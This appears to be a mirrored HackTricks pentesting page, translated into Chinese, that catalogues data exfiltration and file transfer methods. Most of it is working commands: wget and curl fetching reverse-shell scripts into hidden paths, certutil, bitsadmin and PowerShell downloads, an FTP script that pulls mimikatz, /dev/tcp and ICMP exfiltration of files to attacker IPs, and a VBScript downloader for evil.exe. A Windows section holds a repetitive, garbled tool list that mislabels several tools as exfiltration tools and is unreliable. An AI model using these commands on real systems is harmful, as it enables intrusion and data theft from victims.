Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/exfiltration.md

16 KiB
Raw Blame History

数据泄露

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

支持HackTricks的其他方式

找到最重要的漏洞以便更快地修复它们。Intruder跟踪您的攻击面运行主动威胁扫描发现从API到Web应用程序和云系统的整个技术堆栈中的问题。立即免费试用

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

常见的被允许传输信息的域名

查看https://lots-project.com/以找到常见的被允许传输信息的域名

复制&粘贴Base64

Linux

base64 -w0 <file> #Encode file
base64 -d file #Decode file

Windows

certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll

HTTP

Linux

wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
fetch 10.10.14.14:8000/shell.py #FreeBSD

Windows

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf

#PS
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"

Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
#OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous

上传文件

# Listen to files
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world

# Send a file
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
# With basic auth:
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world

HTTPS 服务器

# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:443

### PYTHON 2
import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
###

### PYTHON3
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()
###

### USING FLASK
from flask import Flask, redirect, request
from urllib.parse import quote
app = Flask(__name__)
@app.route('/')
def root():
print(request.get_json())
return "OK"
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
###

FTP

FTP服务器Python

pip3 install pyftpdlib
python3 -m pyftpdlib -p 21

FTP服务器NodeJS

sudo npm install -g ftp-srv --save
ftp-srv ftp://0.0.0.0:9876 --root /tmp

FTP服务器pure-ftp

apt-get update && apt-get install pure-ftp

#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

Windows 客户端

#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt

找到最重要的漏洞这样你就可以更快地修复它们。Intruder跟踪您的攻击面运行主动威胁扫描发现整个技术堆栈中的问题从API到Web应用程序和云系统。立即免费试用

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

SMB

Kali作为服务器

kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`

或者使用samba创建一个smb共享

apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart

Windows

Exfiltration

Techniques

  1. Exfiltration Over C2 Channel: Utilize the command and control (C2) channel to exfiltrate data from the target network.

  2. Exfiltration Over Alternative Protocol: Use alternative protocols such as DNS, ICMP, or HTTP to exfiltrate data without being detected easily.

  3. Exfiltration Over Unencrypted/Encrypted Web Protocols: Leverage unencrypted or encrypted web protocols like HTTP or HTTPS to exfiltrate data.

  4. Exfiltration Over Unencrypted/Encrypted Web Protocols Using Web Services: Utilize web services over unencrypted or encrypted web protocols for exfiltration.

  5. Exfiltration Over Unencrypted/Encrypted Web Protocols Using Web Services with Non-standard Ports: Use non-standard ports in combination with web services over unencrypted or encrypted web protocols for exfiltration.

Tools

  • PowerShell: Use PowerShell scripts to exfiltrate data from Windows systems.

  • Certutil: Employ Certutil to decode/encode files for exfiltration.

  • Bitsadmin: Utilize Bitsadmin to download/upload files for exfiltration.

  • WMIC: Leverage WMIC for data exfiltration.

  • FTP: Use FTP for exfiltration purposes.

  • BITS: Utilize Background Intelligent Transfer Service (BITS) for data exfiltration.

  • SMB: Use Server Message Block (SMB) for exfiltration.

  • RDP: Utilize Remote Desktop Protocol (RDP) for exfiltration.

  • Netsh: Use Netsh for data exfiltration.

  • Reg: Utilize Reg commands for exfiltration.

  • Schtasks: Use Schtasks for data exfiltration.

  • Vssadmin: Utilize Vssadmin for exfiltration purposes.

  • Debug.exe: Use Debug.exe for data exfiltration.

  • Powershell Empire: Utilize PowerShell Empire for exfiltration.

  • Mimikatz: Use Mimikatz for data exfiltration.

  • PsExec/PsExec64: Utilize PsExec or PsExec64 for exfiltration.

  • Bitsadmin: Use Bitsadmin for data exfiltration.

  • Certutil: Utilize Certutil for exfiltration purposes.

  • WMIC: Use WMIC for data exfiltration.

  • FTP: Utilize FTP for exfiltration.

  • BITS: Use BITS for data exfiltration.

  • SMB: Utilize SMB for exfiltration.

  • RDP: Use RDP for data exfiltration.

  • Netsh: Utilize Netsh for exfiltration purposes.

  • Reg: Use Reg for data exfiltration.

  • Schtasks: Utilize Schtasks for exfiltration.

  • Vssadmin: Use Vssadmin for data exfiltration.

  • Debug.exe: Utilize Debug.exe for exfiltration purposes.

CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials

WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:

SCP

攻击者必须运行SSHd。

scp <username>@<Attacker_IP>:<directory>/<filename>

SSHFS

如果受害者有SSH攻击者可以将受害者的目录挂载到攻击者的计算机上。

sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/

NC

NCNetcat是一个强大的网络工具可用于创建各种网络连接。它可以用于侦听端口、传输文件、执行命令等。NC可用于数据外泄因为它可以轻松地建立与远程主机的连接并传输数据。

nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file

/dev/tcp

从受害者下载文件

nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim

将文件上传至受害者

nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/10.10.10.10/4444
cat <&6 > file.txt

感谢 @BinaryShadow_

ICMP

# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will 4bytes per ping packet (you could probably increase this until 16)

from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)

SMTP

如果您可以将数据发送到一个SMTP服务器您可以使用Python创建一个SMTP来接收数据

sudo python -m smtpd -n -c DebuggingServer :25

TFTP

在XP和2003中默认情况下在其他系统中需要在安装过程中显式添加

在Kali中启动TFTP服务器

#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp

Python中的TFTP服务器

pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>

受害者连接到Kali服务器

tftp -i <KALI-IP> get nc.exe

PHP

使用 PHP 一行代码下载文件:

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php

VBScript

VBScript Exfiltration

VBScript can be used to exfiltrate data from a compromised system. This can be achieved by reading files, accessing system information, or interacting with network resources. VBScript can then encode the data and send it to an external server controlled by the attacker. This technique can be used to steal sensitive information from a target system.

Attacker> python -m SimpleHTTPServer 80

受害者

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://10.11.0.5/evil.exe evil.exe

Debug.exe

这是一种疯狂的技术,适用于 Windows 32 位机器。其思想是使用 debug.exe 程序。它用于检查二进制文件,就像一个调试器。但它也可以从十六进制重建它们。所以想法是我们拿二进制文件,比如 netcat。然后将其反汇编为十六进制,在受损机器上粘贴到一个文件中,然后用 debug.exe 组装它。

Debug.exe 只能组装 64 kb。所以我们需要使用小于该大小的文件。我们可以使用 upx 进一步压缩它。所以让我们这样做:

upx -9 nc.exe

现在它只有 29 kb。完美。所以现在让我们对其进行反汇编

wine exe2bat.exe nc.exe nc.txt

现在我们只需将文本复制粘贴到我们的Windows shell中。然后它将自动创建一个名为nc.exe的文件。

DNS

找到最重要的漏洞这样您就可以更快地修复它们。Intruder跟踪您的攻击面运行主动威胁扫描发现整个技术堆栈中的问题从API到Web应用程序和云系统。立即免费试用 今天。

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

从零开始学习AWS黑客技术成为英雄 htARTEHackTricks AWS红队专家

支持HackTricks的其他方式